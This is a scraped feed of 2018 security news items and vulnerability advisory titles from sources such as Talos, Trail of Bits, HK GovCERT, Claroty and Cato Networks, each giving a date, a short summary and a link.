https://www.akamai.com/blog/culture/an-experiment-with-reverse-mentoring-at-akamai-india-women-mentoring-senior-leaders-on-gender-inclusion
10 Rules for the Secure Use of Cryptocurrency Hardware Wallets
2018-11-27T11:50:43Z | 1543319443

Earlier this year, the Web3 Foundation (W3F) commissioned Trail of Bits for a security review and assessment of the risks in storing cryptocurrency. Everyone who owns cryptocurrency — from large institutions to individual enthusiasts — shares the W3F’s concerns. In service to the broader community, the W3F encouraged us to publish our recommendations for the […]

https://blog.trailofbits.com/2018/11/27/10-rules-for-the-secure-use-of-cryptocurrency-hardware-wallets/
Why Traditional MPLS Networks are Ill-Suited for UCaaS
2018-11-26T09:19:07Z | 1543223947

Unified Communications as a Service (UCaaS) adoption is on the rise in the enterprise and with that comes significant impact for IT managers considering how their MPLS network transformation. I’ll be taking a deeper look into those challenges in this week’s webinar, but here’s a quick preview. What’s UC and why UCaaS Like UC, UCaaS... The post Why Traditional MPLS Networks are Ill-Suited for UCaaS appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-traditional-mpls-networks-are-ill-suited-for-ucaas/
Security Alert (A18-11-08): Vulnerability in VMware Products
2018-11-23T04:00:00Z | 1542945600

VMware has published a security advisory to address an integer overflow vulnerability in the virtual network devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Eesti ja Iisrael sõlmisid digilahenduste arendamiseks koostööleppe
2018-11-22T10:24:42Z | 1542882282

Riigi Infosüsteemi Amet (RIA) ning Iisraeli Riiklik Info- ja Tehnoloogiaamet (ICT) sõlmisid elektroonilise identiteedi valdkonna ja andmevahetuse lahenduste arendamiseks koostööleppe.

https://ria.ee/uudised/eesti-ja-iisrael-solmisid-digilahenduste-arendamiseks-koostooleppe
The Best IT Network and SD-WAN Events for 2019
2018-11-21T11:44:47Z | 1542800687

SD-WAN continues to be one of the fastest growing industries across the globe. Revenues increased 83.3% in 2017, and predictions estimate that it will reach $4.5 billion according to the IDC. The list of SD-WAN events and conferences scheduled for 2019 is already quite impressive, and it’s already on our agenda to start marking our... The post The Best IT Network and SD-WAN Events for 2019 appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-best-it-network-and-sd-wan-events-for-2019/
Security Alert (A18-11-07): Vulnerability in Adobe Flash Player
2018-11-21T04:00:00Z | 1542772800

Adobe released a security update to address a vulnerability found in the Adobe Flash Player.

https://www.govcert.gov.hk/en/alerts_detail.php
Atlantis Word Processor Huffman table code length remote code execution vulnerability
2018-11-20T00:00:00Z | 1542672000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0712
Atlantis Word Processor open document format unchecked NewAnsiString length remote code execution vulnerability
2018-11-20T00:00:00Z | 1542672000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0711
Atlantis Word Processor rich text format uninitialized TAutoList remote code execution vulnerability
2018-11-20T00:00:00Z | 1542672000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0713
Return of the Blockchain Security Empire Hacking
2018-11-19T16:20:10Z | 1542644410

Remember last December’s Empire Hacking? The one where we dedicated the event to sharing the best information about blockchain and smart contract security? Let’s do that again, and let’s make it a tradition; a half-day mini conference focused exclusively on a single topic every December. On December 12, please join us at Buzzfeed’s NYC offices […]

https://blog.trailofbits.com/2018/11/19/return-of-the-blockchain-security-empire-hacking/
How To Make A Smarter Last-Mile Management Service
2018-11-19T07:38:09Z | 1542613089

Today we introduced Cato Intelligent Last-Mile Management (ILMM), a new service that offloads the burden of monitoring and managing the lines connecting your sites to Cato PoPs from around the globe. Simplifying last-mile management is an enormous step forward in simplifying global SD-WAN deployments. Here’s why. The Last-Mile: SD-WAN’s Achilles Heel Getting the last-mile right... The post How To Make A Smarter Last-Mile Management Service appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-make-a-smarter-last-mile-management-service/
TP-Link TL-R600VPN HTTP Server fs directory Remote Code Execution Vulnerability
2018-11-19T00:00:00Z | 1542585600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0620
TP-Link TL-R600VPN HTTP server denial-of-service vulnerability
2018-11-19T00:00:00Z | 1542585600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0617
TP-Link TL-R600VPN HTTP server information disclosure vulnerability
2018-11-19T00:00:00Z | 1542585600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0618
TP-Link TL-R600VPN HTTP server ping address remote code execution vulnerability
2018-11-19T00:00:00Z | 1542585600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0619
Scanning Akamai?s Edge Servers for Vulnerabilities, Correctly
2018-11-16T14:44:00Z | 1542379440

Continuous monitoring of the Akamai Edge Platform for security vulnerabilities is an integral part of all engineering efforts at Akamai. In addition to our internal vulnerability management program, we engage with third-party assessors to periodically perform external scans of our systems since this is required for compliance with security standards such as PCI DSS and FedRAMP.

https://www.akamai.com/blog/security/scanning-akamai-s-edge-servers-for-vulnerabilities--correctly
Trail of Bits @ Devcon IV Recap
2018-11-16T11:50:22Z | 1542369022

We wanted to make up for missing the first three Devcons, so we participated in this year’s event through a number of talks, a panel, and two trainings. For those of you who couldn’t join us, we’ve summarized our contributions below. We hope to see you there next year. Using Manticore and Symbolic Execution to […]

https://blog.trailofbits.com/2018/11/16/trail-of-bits-devcon-iv-recap/
Küberkurjategijad on sihikule võtnud ettevõtted
2018-11-16T08:54:11Z | 1542358451

2018. aasta viimase kvartali suundumused näitavad, et tavakasutajate asemel sihivad küberkurjategijad järjest enam ettevõtete raha eest otsustajaid. Raha püütakse välja petta keerukate ja aeganõudvate petuskeemidega ning eriti ettevaatlik tuleks olla siis, kui koostööpartner palub muuta pangakonto numbrit.

https://ria.ee/uudised/kuberkurjategijad-sihikule-votnud-ettevotted
Security Alert (A18-11-06): Multiple Vulnerabilities in IBM Notes and Domino
2018-11-16T04:00:00Z | 1542340800

Multiple vulnerabilities are found in IBM Notes and Domino. The bundled Java virtual machine (JVM) is susceptible to different attacks.

https://www.govcert.gov.hk/en/alerts_detail.php
Protecting Your Website Visitors from Magecart
2018-11-15T14:00:00Z | 1542290400

Learn mitigation options that prevent your site from JavaScript skimmer code threats and protects your customers.

https://www.akamai.com/blog/security/protect-website-visitors-from-megacart
SD-WAN: Unstacking the Branch for WAN Simplicity
2018-11-15T08:01:05Z | 1542268865

Managing a big pile of network gear at every branch location is a hassle. No surprise, then, that Nemertes’ 2018-19 WAN Economics and Technologies research study is showing huge interest in collapsing the branch stack among those deploying SD-WAN: 78% want to replace some or all branch routers with SD-WAN solutions 77% want to replace... The post SD-WAN: Unstacking the Branch for WAN Simplicity appeared first on Cato Networks.

https://www.catonetworks.com/blog/sd-wan-unstacking-the-branch-for-wan-simplicity/
High Threat Security Alert (A18-11-04): Multiple Vulnerabilities in Microsoft Products (November 2018)
2018-11-14T04:00:00Z | 1542168000

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-11-05): Multiple Vulnerabilities in Adobe Flash Player and Adobe Reader/Acrobat
2018-11-14T04:00:00Z | 1542168000

Security updates are released for Adobe Flash Player and Adobe Reader/Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
How CDN Can Make Your APIs More Powerful
2018-11-12T05:00:00Z | 1541998800

Companies of all sizes and in every industry use APIs for a staggering range of activities. Just a few examples: APIs make it easy to include weather forecasts in apps, recommend driving routes where you are least likely to have an accident, and allow banks to comply with open banking regulations.

https://www.akamai.com/blog/developers/how-cdn-can-make-your-apis-more-powerful
Security Alert (A18-11-03): Multiple Vulnerabilities in VMware Products
2018-11-12T04:00:00Z | 1541995200

VMware has published a security advisory to address an uninitialised stack memory vulnerability in the vmxnet3 virtual network adapter.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-11-02): Vulnerabilities in Solid State Drives (SSDs) with Hardware Encryption
2018-11-09T04:00:00Z | 1541736000

A local attacker could disclose the encrypted information on the vulnerable Solid State Drives (SSD) by altering the firmware through the debugging interface.

https://www.govcert.gov.hk/en/alerts_detail.php
Application Development Guidance: Introduction
2018-11-08T16:54:37Z | 1541696077

Guidance for risk assessors, and developers of applications which will be run on devices handling OFFICIAL data.

https://www.ncsc.gov.uk/guidance/application-development-guidance-introduction
We crypto now
2018-11-07T11:50:17Z | 1541591417

Building and using cryptographic libraries is notoriously difficult. Even when each component of the system has been implemented correctly (quite difficult to do), improperly combining these pieces can lead to disastrous results. Cryptography, when rolled right, forms the bedrock of any secure application. By combining cutting-edge mathematics and disciplined software engineering, modern crypto-systems guarantee data […]

https://blog.trailofbits.com/2018/11/07/we-crypto-now/
Security Alert (A18-11-01): Vulnerability in Commons FileUpload Library for Apache Struts and Other Java-based systems
2018-11-07T04:00:00Z | 1541563200

A vulnerability in the Apache Commons FileUpload library discovered in 2016 affects Apache Struts systems.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2018-18565
2018-11-06T00:00:00Z | 1541462400

CWE-284: IMPROPER ACCESS CONTROL Improper access control allows attackers in the adjacent network to change the instrument configuration.

https://claroty.com/team82/disclosure-dashboard/cve-2018-18565
CVE-2018-18564
2018-11-06T00:00:00Z | 1541462400

CWE-284: IMPROPER ACCESS CONTROL Improper access control to a service command allows attackers in the adjacent network to execute arbitrary code on the system through a crafted message.

https://claroty.com/team82/disclosure-dashboard/cve-2018-18564
CVE-2018-18563
2018-11-06T00:00:00Z | 1541462400

CWE-434 : UNRESTRICTED UPLOAD OF FILE WITH DANGEROUS TYPE A vulnerability in the software update mechanism allows an attacker in adjacent network to overwrite arbitrary files on the system through a crafted update package.

https://claroty.com/team82/disclosure-dashboard/cve-2018-18563
CVE-2018-18562
2018-11-06T00:00:00Z | 1541462400

CWE-78: IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN OS COMMAND ('OS COMMAND INJECTION') Insecure permissions in a service interface may allow authenticated attackers in the adjacent network to execute arbitrary commands on the operating systems.

https://claroty.com/team82/disclosure-dashboard/cve-2018-18562
CVE-2018-18561
2018-11-06T00:00:00Z | 1541462400

CWE-287 : IMPROPER AUTHENTICATION Weak access credentials may enable attackers in the adjacent network to gain unauthorized service access via a service interface.

https://claroty.com/team82/disclosure-dashboard/cve-2018-18561
Sign of the Times: Time to Eliminate Your Dependence on MPLS and Switch to SD-WAN
2018-11-05T09:38:11Z | 1541410691

Multinational corporations have traditionally needed global MPLS services to build their WAN. Until recently, there simply was no alternative. That has changed now that secure, global SD-WAN as a Service is available worldwide. By leveraging the power of distributed software, plentiful IP capacity, and off-the-shelf hardware, SD-WAN as a service provides a reliable, flexible, and... The post Sign of the Times: Time to Eliminate Your Dependence on MPLS and Switch to SD-WAN appeared first on Cato Networks.

https://www.catonetworks.com/blog/sign-of-the-times-time-to-eliminate-your-dependence-on-mpls-and-switch-to-sd-wan/
Should You Be Concerned About the Security of SD-WAN?
2018-10-31T15:35:11Z | 1541000111

Traditional hub-and-spoke networking has enterprises backhauling WAN traffic from branches over MPLS circuits to a central site and applying security policies before sending the traffic to the cloud or the public Internet. This practice has become prohibitively slow, inefficient and costly as more and more branch traffic is intended to go to the cloud or... The post Should You Be Concerned About the Security of SD-WAN? appeared first on Cato Networks.

https://www.catonetworks.com/blog/should-you-be-concerned-about-the-security-of-sd-wan/
Security Alert (A18-10-09): Multiple Vulnerabilities in Apple iOS
2018-10-31T04:00:00Z | 1540958400

Apple has released security updates in its latest iOS version 12.1 to fix 31 vulnerabilities identified in various iOS devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Yi Technology Home Camera 27US CRCDec denial-of-service vulnerability
2018-10-31T00:00:00Z | 1540944000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0602
Yi Technology Home Camera 27US notice_to denial-of-service vulnerability
2018-10-31T00:00:00Z | 1540944000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0595
Yi Technology Home Camera 27US QR Code trans_info Code Execution Vulnerability
2018-10-31T00:00:00Z | 1540944000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0571
Yi Technology Home Camera 27US cloudAPI SSID Code Execution Vulnerability
2018-10-31T00:00:00Z | 1540944000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0580
Simple DirectMedia Layer SDL2_Image do_layer_surface code execution vulnerability
2018-10-31T00:00:00Z | 1540944000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0645
Yi Technology Home Camera 27US p2p_tnp cleartext data transmission vulnerability
2018-10-31T00:00:00Z | 1540944000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0616
Yi Technology Home Camera 27US Firmware Downgrade Vulnerability
2018-10-31T00:00:00Z | 1540944000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0566
Yi Technology Home Camera 27US QR Code Base64 Code Execution Vulnerability
2018-10-31T00:00:00Z | 1540944000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0572
Yi Technology Home Camera 27US TimeSync Code Execution Vulnerability
2018-10-31T00:00:00Z | 1540944000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0567
Yi Technology Home Camera 27US Firmware Update Code Execution Vulnerability
2018-10-31T00:00:00Z | 1540944000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0565
Yi Technology Home Camera 27US Firmware 7z CRC Collision Vulnerability
2018-10-31T00:00:00Z | 1540944000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0584
Yi Technology Home Camera 27US nonce reuse authentication bypass vulnerability
2018-10-31T00:00:00Z | 1540944000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0601
100 days on the board of directors of FIRST
2018-10-29T19:00:00Z | 1540839600

Alexander Jaeger shares his expirience after 100 days being on the board of directors of FIRST.

https://www.first.org/blog/20181029-100_days_on_board_of_directors
Cold Incident Response 2018
2018-10-29T19:00:00Z | 1540839600

An organizers view on the 2018 Oslo Technical Symposium

https://www.first.org/blog/20181105_Cold_IR
How contract migration works
2018-10-29T10:50:16Z | 1540810216

Smart contracts can be compromised: they can have bugs, the owner’s wallet can be stolen, or they can be trapped due to an incorrect setting. If you develop a smart contract for your business, you must be prepared to react to events such as these. In many cases, the only available solution is to deploy […]

https://blog.trailofbits.com/2018/10/29/how-contract-migration-works/
The Good, the Bad, and the Weird
2018-10-26T10:50:13Z | 1540551013

Let’s automatically identify weird machines in software. Combating software exploitation has been a cat-and-mouse game ever since the Morris worm in 1988. Attackers use specific exploitation primitives to achieve unintended code execution. Major software vendors introduce exploit mitigation to break those primitives. Back and forth, back and forth. The mitigations have certainly raised the bar […]

https://blog.trailofbits.com/2018/10/26/the-good-the-bad-and-the-weird/
MKVToolNix MKVINFO read_one_element code execution vulnerability
2018-10-26T00:00:00Z | 1540512000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0694
Sophos HitmanPro.Alert hmpalert 0x222000 kernel memory disclosure vulnerability
2018-10-25T00:00:00Z | 1540425600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0635
Sophos HitmanPro.Alert hmpalert 0x2222CC privilege escalation vulnerability
2018-10-25T00:00:00Z | 1540425600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0636
Cato: The SD-WAN Visionary
2018-10-24T14:29:31Z | 1540391371

What’s your vision? At Cato, we know our vision. It’s the power of convergence of networking and security in the cloud. It’s a vision that’s transforming the industry and one that has led Cato to be recognized as a Visionary in the just-released Gartner Magic Quadrant for WAN Edge Infrastructure. The question of vision is... The post Cato: The SD-WAN Visionary appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-the-sd-wan-visionary/
Security Alert (A18-10-08): Multiple Vulnerabilities in Firefox
2018-10-24T04:00:00Z | 1540353600

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
Top WAN Issues Faced by Globally Distributed Enterprises
2018-10-22T12:36:28Z | 1540211788

Nationalistic trade wars aside, the world’s economy is truly global, and globally distributed enterprises are aggressively expanding their business into more countries. Growth is especially brisk in the Asia Pacific region and China in particular. To establish their facilities, companies need reliable and high-performance network connectivity to global data centers both in-region and out-of-region. Companies... The post Top WAN Issues Faced by Globally Distributed Enterprises appeared first on Cato Networks.

https://www.catonetworks.com/blog/top-wan-issues-faced-by-globally-distributed-enterprises/
A Guide to Post-Quantum Cryptography
2018-10-22T10:50:12Z | 1540205412

For many high-assurance applications such as TLS traffic, medical databases, and blockchains, forward secrecy is absolutely essential. It is not sufficient to prevent an attacker from immediately decrypting sensitive information. Here the threat model encompasses situations where the adversary may dedicate many years to the decryption of ciphertexts after their collection. One potential way forward […]

https://blog.trailofbits.com/2018/10/22/a-guide-to-post-quantum-cryptography/
Slither – a Solidity static analysis framework
2018-10-19T10:50:09Z | 1539946209

Slither is the first open-source static analysis framework for Solidity. Slither is fast and precise; it can find real vulnerabilities in a few seconds without user intervention. It is highly customizable and provides a set of APIs to inspect and analyze Solidity code easily. We use it in all of our security reviews. Now you […]

https://blog.trailofbits.com/2018/10/19/slither-a-solidity-static-analysis-framework/
Security Alert (A18-10-07): Multiple Vulnerabilities in Drupal
2018-10-19T04:00:00Z | 1539921600

Drupal released security updates to fix several vulnerabilities resided in the Drupal Core.

https://www.govcert.gov.hk/en/alerts_detail.php
libssh Authentication Bypass Vulnerability
2018-10-19T00:00:00Z | 1539907200

A vulnerability was found in libssh's server-side state machine before versions 0.7.6 and 0.8.4. A malicious client could create channels without first performing authentication, resulting in unauthorized access. CVE: CVE-2018-10933 Last updated: Oct. 19, 2018, midnight

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0016
Security Alert (A18-10-05): Multiple Vulnerabilities in Oracle Java and Oracle Products (October 2018)
2018-10-18T04:00:00Z | 1539835200

Oracle has released Critical Patch Update Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-10-06): Vulnerability in VMware Products
2018-10-18T04:00:00Z | 1539835200

VMware has published a security advisory to address a vulnerability in VMware vSphere ESXi (ESXi), VMware Workstation and VMWare Fusion.

https://www.govcert.gov.hk/en/alerts_detail.php
Live Networks LIVE555 streaming media RTSPServer lookForHeader code execution vulnerability
2018-10-18T00:00:00Z | 1539820800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0684
Security Response Headers
2018-10-17T13:00:00Z | 1539781200

Security response headers are a critical security capability that all organizations should consider. This blog post is the first in a series that will discuss different security headers and go in-depth with how to configure them for maximum benefit.

https://www.akamai.com/blog/security/security-response-headers
Cato Extends Self-Healing, End-to-End for Enterprise SD-WANs
2018-10-17T10:35:16Z | 1539772516

With hurricane season upon us, IT already has too many examples of the importance of high availability planning. But building in local redundancy isn’t enough when floods or hurricanes hit. You need to think through the multiple layers of failover across the entire networking and security infrastructure. Yes, that’s usually going to require hours of... The post Cato Extends Self-Healing, End-to-End for Enterprise SD-WANs appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-extends-self-healing-end-to-end-for-enterprise-sd-wans/
Linksys ESeries multiple OS command injection vulnerabilities
2018-10-16T00:00:00Z | 1539648000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0625
RIA kübertalgul osalevad kümned asutused üle Eesti
2018-10-15T05:29:28Z | 1539581368

Täna, kübertalgupäeval koolitavad infoturbeeksperdid kümnete asutuste töötajaid ning koolilapsi üle Eesti.

https://ria.ee/uudised/ria-kubertalgul-osalevad-kumned-asutused-ule-eesti
What Enterprises Say about Cato’s SD-WAN
2018-10-14T10:46:42Z | 1539514002

Marketers have their brochures; engineers have their test reports, but nothing is more compelling when selecting an SD-WAN than real-life experience. The “proof” truly is “in the pudding,” as they say. Today’s blog takes a look at some challenges real customers faced with their WAN infrastructure, and how Cato Networks was able to help. Paysafe... The post What Enterprises Say about Cato’s SD-WAN appeared first on Cato Networks.

https://www.catonetworks.com/blog/what-enterprises-say-about-catos-sd-wan/
Introduction to Verifiable Delay Functions (VDFs)
2018-10-12T10:50:10Z | 1539341410

Finding randomness on the blockchain is hard. A classic mistake developers make when trying to acquire a random value on-chain is to use quantities like future block hashes, block difficulty, or timestamps. The problem with these schemes is that they are vulnerable to manipulation by miners. For example, suppose we are trying to run an […]

https://blog.trailofbits.com/2018/10/12/introduction-to-verifiable-delay-functions-vdfs/
Top 5 Myths About SD-WAN
2018-10-10T13:51:49Z | 1539179509

MPLS has been a popular choice for enterprise networks for many years. Despite the relatively high costs, MPLS can deliver SLA-backed performance required for today’s applications. Although it has almost legendary status, every legend develops myths. Let’s take a look at five myths about MPLS: Myth 1: MPLS is Necessary for Enterprises that Demand High... The post Top 5 Myths About SD-WAN appeared first on Cato Networks.

https://www.catonetworks.com/blog/top-5-myths-about-sd-wan/
High Threat Security Alert (A18-10-04): Multiple Vulnerabilities in Microsoft Products (October 2018)
2018-10-10T04:00:00Z | 1539144000

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components. Reports indicate that proof-of-concept and fully workable exploit codes targeting the vulnerabilities have been publicly disclosed.

https://www.govcert.gov.hk/en/alerts_detail.php
Microsoft WindowsCodecs.dll SniffAndConvertToWideString information leak vulnerability
2018-10-10T00:00:00Z | 1539129600

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0644
Intuit Quicken Deluxe 2018 for Mac Password Protection Authentication Bypass Vulnerability
2018-10-09T00:00:00Z | 1539043200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0537
Intel Unified Shader Compiler for Intel Graphics Accelerator Remote Denial Of Service
2018-10-09T00:00:00Z | 1539043200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0568
VMware Workstation 14 Shader Functionality Assert Denial Of Service
2018-10-09T00:00:00Z | 1539043200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0589
Intel Unified Shader Compiler for Intel Graphics Accelerator Remote Denial Of Service
2018-10-09T00:00:00Z | 1539043200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0579
Intel Unified Shader Compiler for Intel Graphics Accelerator Pointer Corruption
2018-10-09T00:00:00Z | 1539043200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0533
How to Spot Good Fuzzing Research
2018-10-05T10:50:52Z | 1538736652

Of the nearly 200 papers on software fuzzing that have been published in the last three years, most of them—even some from high-impact conferences—are academic clamor. Fuzzing research suffers from inconsistent and subjective benchmarks, which keeps this potent field in a state of arrested development. We’d like to help explain why this has happened and […]

https://blog.trailofbits.com/2018/10/05/how-to-spot-good-fuzzing-research/
Ethereum security guidance for all
2018-10-04T10:50:23Z | 1538650223

We came away from ETH Berlin with two overarching impressions: first, many developers were hungry for any guidance on security, and second; too few security firms were accessible. When we began taking on blockchain security engagements in 2016, there were no tools engineered for the work. Useful documentation was hard to find and hidden among […]

https://blog.trailofbits.com/2018/10/04/ethereum-security-guidance-for-all/
Security Alert (A18-10-03): Multiple Vulnerabilities in Cisco Products
2018-10-04T04:00:00Z | 1538625600

Cisco released security advisories to address the vulnerabilities in Adaptive Security Appliance (ASA) software and Firepower Threat Defense (FTD) software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-10-02): Multiple Vulnerabilities in Firefox
2018-10-03T04:00:00Z | 1538539200

Mozilla has published a security advisory to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
Google PDFium JBIG2 image ComposeToOpt2WithRect information disclosure vulnerability
2018-10-03T00:00:00Z | 1538524800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0639
RIA hoiatab väljapressijate eest
2018-10-02T11:09:32Z | 1538478572

Paari viimase nädala jooksul on taas hakanud jõudsamalt levima väljapressimiskirjad.

https://ria.ee/uudised/ria-hoiatab-valjapressijate-eest
Security Alert (A18-10-01): Multiple Vulnerabilities in Adobe Reader/Acrobat
2018-10-02T04:00:00Z | 1538452800

Security updates are released for Adobe Reader/Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Adobe Acrobat Reader DC collab review server remote code execution vulnerability
2018-10-02T00:00:00Z | 1538438400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0623
Foxit PDF Reader JavaScript getPageRotation remote code execution vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0609
Foxit PDF Reader JavaScript field object isDefaultChecked remote code execution vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0664
Foxit PDF Reader Javascript importDataObject Remote Code Execution Vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0662
Atlantis Word Processor Word Document Complex Piece Descriptor Table Fc.Compressed Code Execution Vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0646
Foxit PDF Reader JavaScript field object signatureGetSeedValue remote code execution vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0665
Atlantis Word Processor uninitialized TDocOleObject code execution vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0641
Atlantis Word Processor document endnote reference code execution vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0650
Foxit PDF Reader JavaScript Field object signatureInfo remote code execution vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0663
Atlantis Word Processor Word document paragraph property (0xD608) sprmTDefTable uninitialized length code execution vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0652
Foxit PDF Reader JavaScript JSON.Stringify this remote code execution vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0611
Foxit PDF Reader Javascript removeDataObject Remote Code Execution Vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0607
Foxit PDF Reader JavaScript this.bookmarkRoot.children remote code execution vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0630
Foxit PDF Reader Javascript JSON.Stringify this.info Remote Code Execution Vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0612
Foxit PDF Reader JavaScript getPageBox remote code execution vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0610
Foxit PDF Reader JavaScript this.info multiple remote code execution vulnerabilities
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0628
Foxit PDF Reader Javascript Optional Content Group Remote Code Execution Vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0661
Foxit PDF Reader JavaScript getPageNumWords remote code execution vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0629
Atlantis Word Processor empty TTableRow TList code execution vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0651
Foxit PDF Reader JavaScript this.dataObjects remote code execution vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0631
Atlantis Word Processor Windows Enhanced Metafile Code Execution Vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0666
Foxit PDF Reader JavaScript page change remote code execution vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0660
Foxit PDF Reader JavaScript this.event.target Remote Code Execution Vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0632
Atlantis Word Processor JPEG length underflow code execution vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0667
Foxit PDF Reader JavaScript getNthFieldName remote code execution vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0608
Atlantis Word Processor Office Open XML TTableRow double free code execution vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0668
Foxit PDF Reader JavaScript getPageNthWord remote code execution vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0613
Atlantis Word Processor Office Open XML uninitialized TTableRow code execution vulnerability
2018-10-01T00:00:00Z | 1538352000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0669
Security Alert (A18-09-07): Multiple Vulnerabilities in Cisco Products
2018-09-28T04:00:00Z | 1538107200

Cisco has released 21 security advisories fixing a number of vulnerabilities in Cisco IOS and IOS XE software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-09-08): Vulnerability in Linux Kernel
2018-09-28T04:00:00Z | 1538107200

An Integer overflow vulnerability was found in several Linux distributions.

https://www.govcert.gov.hk/en/alerts_detail.php
PPA hakkab uuest aastast andma välja värske kujundusega ID-kaarte
2018-09-27T10:56:12Z | 1538045772

Hiljemalt 1. jaanuarist 2019 hakkavad Politsei- ja Piirivalveameti teenindused väljastama uut ID-kaarti, millel on lisaks uuele kujundusele ka uued turvaelemendid ning kontaktivaba liides.

https://ria.ee/uudised/ppa-hakkab-uuest-aastast-andma-valja-varske-kujundusega-id-kaarte
Effortless security feature detection with Winchecksec
2018-09-26T10:50:53Z | 1537959053

